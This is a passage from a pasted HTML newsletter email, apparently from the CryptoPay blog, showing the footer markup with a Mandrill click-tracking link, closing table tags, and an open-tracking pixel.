  869. <a href="https://mandrillapp.com/track/click/30689256/blog.cryptopay.me?p=eyJzIjoickR6MDE0VVZXYm9Udk43c3lDUjIyYjJCMHlnIiwidiI6MSwicCI6IntcInVcIjozMDY4OTI1NixcInZcIjoxLFwidXJsXCI6XCJodHRwOlxcXC9cXFwvYmxvZy5jcnlwdG9wYXkubWVcIixcImlkXCI6XCI0NmM5ZTdhYjI1NGM0YzQwYWEyZTBmMjhiZjZiMTgxZVwiLFwidXJsX2lkc1wiOltcImFhZDY0YmVhODkyMTA2MTNmN2VjZmVkN2NlOGEwNzhmNjNkNmFjMDBcIl19In0" target="_blank"><img src="http://cdn-images.mailchimp.com/icons/social-block-v2/outline-gray-tumblr-48.png" style="display:block;" height="24" width="24" class=""></a>
  870. </td>
  871.  
  872.  
  873. </tr>
  874. </tbody></table>
  875. </td>
  876. </tr>
  877. </tbody></table>
  878. </td>
  879. </tr>
  880. </tbody></table>
  881.  
  882. <!--[if mso]>
  883. </td>
  884. <![endif]-->
  885.  
  886. <!--[if mso]>
  887. </tr>
  888. </table>
  889. <![endif]-->
  890. </td>
  891. </tr>
  892. </tbody></table>
  893. </td>
  894. </tr>
  895. </tbody></table>
  896. </td>
  897. </tr>
  898. </tbody></table>
  899.  
  900. </td>
  901. </tr>
  902. </tbody>
  903. </table></td>
  904. </tr>
  905. </table>
  906. <!-- // END FOOTER -->
  907. </td>
  908. </tr>
  909. </table>
  910. <!-- // END TEMPLATE -->
  911. </td>
  912. </tr>
  913. </table>
  914. </center>
  915. <img src="https://mandrillapp.com/track/open.php?u=30689256&id=46c9e7ab254c4c40aa2e0f28bf6b181e" height="1" width="1"></body>
  916. </html>
  917. --_av-iIhBhMvGhKw64rSwsqbSWQ--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement